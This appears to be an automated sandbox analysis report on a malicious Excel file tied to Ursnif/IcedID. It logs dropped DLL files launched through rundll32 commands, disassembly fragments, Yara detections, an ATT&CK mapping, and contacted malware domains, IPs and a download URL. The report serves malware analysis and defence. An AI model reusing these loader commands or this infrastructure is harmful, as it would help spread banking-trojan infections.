Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\fikftkm.thj,DllRegisterServer	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\fikftkm.thj1,DllRegisterServer	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\fikftkm.thj2,DllRegisterServer	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\fikftkm.thj3,DllRegisterServer	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\fikftkm.thj4,DllRegisterServer	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\fikftkm.thj2,DllRegisterServer	Jump to behavior
Source: C:\Program Files\Internet Explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2824 CREDAT:275457 /prefetch:2	Jump to behavior
Source: C:\Program Files\Internet Explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3004 CREDAT:275457 /prefetch:2	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\rundll32.exe	Automated click: OK
Source: C:\Windows\System32\rundll32.exe	Automated click: OK
Source: C:\Windows\System32\rundll32.exe	Automated click: OK
Source: C:\Windows\System32\rundll32.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 6_2_10001745 LoadLibraryA,GetProcAddress,

6_2_10001745

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_002A348F push dword ptr [ebp-10h]; mov dword ptr [esp], ecx	6_2_002A34A1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_002A348F push dword ptr [ebp-0Ch]; mov dword ptr [esp], ecx	6_2_002A3632
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_002A348F push 00000000h; mov dword ptr [esp], edx	6_2_002A37FE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_002A348F push edx; mov dword ptr [esp], 00000002h	6_2_002A384A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_002A348F push 00000000h; mov dword ptr [esp], ecx	6_2_002A38D7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_002A6194 push eax; mov dword ptr [esp], 00000004h	6_2_002A61AF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_002A6194 push esi; mov dword ptr [esp], 00001000h	6_2_002A61B7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_002A6194 push 00000000h; mov dword ptr [esp], ebp	6_2_002A6267
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_002A6424 push dword ptr [ebp-08h]; mov dword ptr [esp], esp	6_2_002A644D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_002A6424 push 00000000h; mov dword ptr [esp], edi	6_2_002A64EC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_002A6424 push 00000000h; mov dword ptr [esp], ecx	6_2_002A657A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_002A6424 push 00000000h; mov dword ptr [esp], ebp	6_2_002A65D2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_002A6424 push dword ptr [ebp-08h]; mov dword ptr [esp], eax	6_2_002A66E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_002A6424 push dword ptr [ebp-04h]; mov dword ptr [esp], ecx	6_2_002A6736
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_002A463F push dword ptr [ebp-0Ch]; mov dword ptr [esp], eax	6_2_002A4648
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_002A463F push ebp; mov dword ptr [esp], 00000003h	6_2_002A46A2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_002A463F push ebx; mov dword ptr [esp], 00F00000h	6_2_002A46AB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_002A6633 push dword ptr [ebp-08h]; mov dword ptr [esp], eax	6_2_002A66E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_002A6633 push dword ptr [ebp-04h]; mov dword ptr [esp], ecx	6_2_002A6736
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_002A1000 push 00000000h; mov dword ptr [esp], ebp	6_2_002A110A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_002A1000 push 00000000h; mov dword ptr [esp], ebx	6_2_002A1146
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_002A1000 push 00000000h; mov dword ptr [esp], ebp	6_2_002A118E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_002A1000 push ebp; mov dword ptr [esp], 00000002h	6_2_002A1270
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_002A1000 push dword ptr [ebp-08h]; mov dword ptr [esp], ecx	6_2_002A12E7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_002A1918 push dword ptr [ebp-24h]; mov dword ptr [esp], ebx	6_2_002A1927
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_002A1918 push 00000000h; mov dword ptr [esp], ecx	6_2_002A1B10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_002A1918 push 00000000h; mov dword ptr [esp], esi	6_2_002A1CD4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_002A1918 push 00000000h; mov dword ptr [esp], esi	6_2_002A1D37
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_002A1918 push dword ptr [ebp-20h]; mov dword ptr [esp], esi	6_2_002A1DC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_002A1918 push 00000000h; mov dword ptr [esp], ebp	6_2_002A1E4C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_002A1918 push dword ptr [ebp-20h]; mov dword ptr [esp], ecx	6_2_002A1F23

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\fikftkm.thj2			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\0104[1].gif			Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\fikftkm.thj2

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\0104[1].gif			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\fikftkm.thj2			Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\fikftkm.thj2

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000006.00000002.2504044164.0000000000170000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 6.2.rundll32.exe.170000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.10000000.10.unpack, type: UNPACKEDPE

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000006.00000003.2495224017.00000000030CD000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.2357108464.00000000031CB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 2764, type: MEMORY

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\0104[1].gif

Jump to dropped file

Source: C:\Windows\SysWOW64\rundll32.exe

6_2_001C12D4

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 6_2_10001745 LoadLibraryA,GetProcAddress,

6_2_10001745

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 6_2_002A2DF5 or edx, dword ptr fs:[00000030h]

6_2_002A2DF5

HIPS / PFW / Operating System Protection Evasion:

Yara detected hidden Macro 4.0 in Excel

Show sources

Source: Yara match

File source: document-1370071295.xls, type: SAMPLE

Source: C:\Windows\System32\rundll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\fikftkm.thj2,DllRegisterServer

Jump to behavior

Source: Yara match

File source: document-1370071295.xls, type: SAMPLE

Source: rundll32.exe, 00000005.00000002.2504123727.00000000006C0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2504465351.0000000000CF0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: rundll32.exe, 00000005.00000002.2504123727.00000000006C0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2504465351.0000000000CF0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: rundll32.exe, 00000005.00000002.2504123727.00000000006C0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2504465351.0000000000CF0000.00000002.00000001.sdmp	Binary or memory string: !Progman

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 6_2_001C269C cpuid

6_2_001C269C

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 6_2_1000102F GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,

6_2_1000102F

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 6_2_001C269C RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

6_2_001C269C

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 6_2_10001850 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

6_2_10001850

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000006.00000002.2504044164.0000000000170000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 6.2.rundll32.exe.170000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.10000000.10.unpack, type: UNPACKEDPE

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000006.00000003.2495224017.00000000030CD000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.2357108464.00000000031CB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 2764, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000006.00000002.2504044164.0000000000170000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 6.2.rundll32.exe.170000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.10000000.10.unpack, type: UNPACKEDPE

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000006.00000003.2495224017.00000000030CD000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.2357108464.00000000031CB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 2764, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation1	Path Interception	Process Injection12	Masquerading121	OS Credential Dumping	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scripting31	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Disable or Modify Tools1	LSASS Memory	Process Discovery2	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Native API1	Logon Script (Windows)	Logon Script (Windows)	Process Injection12	Security Account Manager	Account Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Exploitation for Client Execution3	Logon Script (Mac)	Logon Script (Mac)	Scripting31	NTDS	System Owner/User Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Obfuscated Files or Information1	LSA Secrets	File and Directory Discovery2	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Rundll321	Cached Domain Credentials	System Information Discovery15	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Software Packing1	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
document-1370071295.xls	16%	Virustotal		Browse
document-1370071295.xls	22%	Metadefender		Browse
document-1370071295.xls	48%	ReversingLabs	Document-Word.Trojan.IcedID

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\fikftkm.thj2	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\0104[1].gif	100%	Joe Sandbox ML

Unpacked PE Files

Source	Detection	Scanner	Label	Download
6.2.rundll32.exe.2a0000.2.unpack	100%	Avira	TR/Crypt.XPACK.Gen3	Download File
6.2.rundll32.exe.1c0000.1.unpack	100%	Avira	HEUR/AGEN.1108168	Download File
6.2.rundll32.exe.10000000.10.unpack	100%	Avira	TR/Crypt.XPACK.Gen8	Download File

Domains

Source	Detection	Scanner	Link
mundotecnologiasolar.com	1%	Virustotal	Browse
accesslinksgroup.com	8%	Virustotal	Browse
ponchokhana.com	2%	Virustotal	Browse
under17.com	0%	Virustotal	Browse
vts.us.com	4%	Virustotal	Browse
comosairdoburaco.com.br	2%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://under17.com	0%	Avira URL Cloud	safe
http://under17.com/joomla/W8irzuIA03OC/DHBetYa3Vzl/hddQ_2FkuTZ0IV/Oq1yvMr7E_2Frfr6f90DE/Wv_2B_2Bqw4C	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
mundotecnologiasolar.com	162.241.62.4	true	false	1%, Virustotal, Browse	unknown
accesslinksgroup.com	192.185.129.4	true	true	8%, Virustotal, Browse	unknown
ponchokhana.com	5.100.155.169	true	false	2%, Virustotal, Browse	unknown
under17.com	185.243.114.196	true	true	0%, Virustotal, Browse	unknown
vts.us.com	207.174.213.126	true	false	4%, Virustotal, Browse	unknown
comosairdoburaco.com.br	198.50.218.68	true	false	2%, Virustotal, Browse	unknown
login.microsoftonline.com	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
0	true		low

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check	rundll32.exe, 00000003.00000002.2108249236.0000000001D67000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2102325978.0000000001F17000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2504417204.0000000001CA7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2504688386.00000000022D7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2173362712.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2167173953.0000000001CC7000.00000002.00000001.sdmp	false		high
http://www.windows.com/pctv.	rundll32.exe, 00000009.00000002.2166965953.0000000001AE0000.00000002.00000001.sdmp	false		high
http://investor.msn.com	rundll32.exe, 00000003.00000002.2108057689.0000000001B80000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2102163408.0000000001D30000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2504193532.0000000001AC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2504502612.00000000020F0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2173123549.0000000001C10000.00000002.00000001.sdmp	false		high
http://www.msnbc.com/news/ticker.txt	rundll32.exe, 00000003.00000002.2108057689.0000000001B80000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2102163408.0000000001D30000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2504193532.0000000001AC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2504502612.00000000020F0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2173123549.0000000001C10000.00000002.00000001.sdmp	false		high
http://www.icra.org/vocabulary/.	rundll32.exe, 00000003.00000002.2108249236.0000000001D67000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2102325978.0000000001F17000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2504417204.0000000001CA7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2504688386.00000000022D7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2173362712.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2167173953.0000000001CC7000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	rundll32.exe, 00000003.00000002.2108249236.0000000001D67000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2102325978.0000000001F17000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2504417204.0000000001CA7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2504688386.00000000022D7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2173362712.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2167173953.0000000001CC7000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.hotmail.com/oe	rundll32.exe, 00000003.00000002.2108057689.0000000001B80000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2102163408.0000000001D30000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2504193532.0000000001AC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2504502612.00000000020F0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2173123549.0000000001C10000.00000002.00000001.sdmp	false		high
http://under17.com	rundll32.exe, 00000006.00000002.2504310287.00000000004CD000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://under17.com/joomla/W8irzuIA03OC/DHBetYa3Vzl/hddQ_2FkuTZ0IV/Oq1yvMr7E_2Frfr6f90DE/Wv_2B_2Bqw4C	rundll32.exe, 00000006.00000002.2504310287.00000000004CD000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://investor.msn.com/	rundll32.exe, 00000003.00000002.2108057689.0000000001B80000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2102163408.0000000001D30000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2504193532.0000000001AC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2504502612.00000000020F0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2173123549.0000000001C10000.00000002.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
207.174.213.126	vts.us.com	United States	394695	PUBLIC-DOMAIN-REGISTRYUS	false
162.241.62.4	mundotecnologiasolar.com	United States	46606	UNIFIEDLAYER-AS-1US	false
5.100.155.169	ponchokhana.com	United Kingdom	394695	PUBLIC-DOMAIN-REGISTRYUS	false
185.243.114.196	under17.com	Netherlands	31400	ACCELERATED-ITDE	true
198.50.218.68	comosairdoburaco.com.br	Canada	16276	OVHFR	false
192.185.129.4	accesslinksgroup.com	United States	46606	UNIFIEDLAYER-AS-1US	true

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	381642
Start date:	04.04.2021
Start time:	02:28:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 11s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	document-1370071295.xls
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	20
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winXLS@19/59@7/6
EGA Information:	Failed
HDC Information:	Successful, ratio: 43.9% (good quality ratio 42.1%) Quality average: 79.5% Quality standard deviation: 27.8%
HCA Information:	Successful, ratio: 77% Number of executed functions: 40 Number of non-executed functions: 57
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xls Found Word or Excel or PowerPoint or XPS Viewer Found warning dialog Click Ok Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, WmiPrvSE.exe, svchost.exe Excluded IPs from analysis (whitelisted): 2.20.142.210, 2.20.142.209, 192.35.177.64, 88.221.62.148, 13.107.21.200, 204.79.197.200, 92.123.180.176, 92.123.180.152, 40.126.31.141, 40.126.31.4, 40.126.31.135, 40.126.31.143, 40.126.31.1, 40.126.31.139, 20.190.159.132, 40.126.31.8, 20.190.160.4, 20.190.160.75, 20.190.160.73, 20.190.160.136, 20.190.160.69, 20.190.160.132, 20.190.160.6, 20.190.160.2, 152.199.19.161, 13.107.5.80 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, api.bing.com, bing.com, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, go.microsoft.com, login.live.com, audownload.windowsupdate.nsatc.net, www-bing-com.dual-a-0001.a-msedge.net, a4.bing.com, au-bg-shim.trafficmanager.net, apps.identrust.com, akam.bing.com, api-bing-com.e-0001.e-msedge.net, www.bing.com, dual-a-0001.a-msedge.net, ie9comview.vo.msecnd.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, 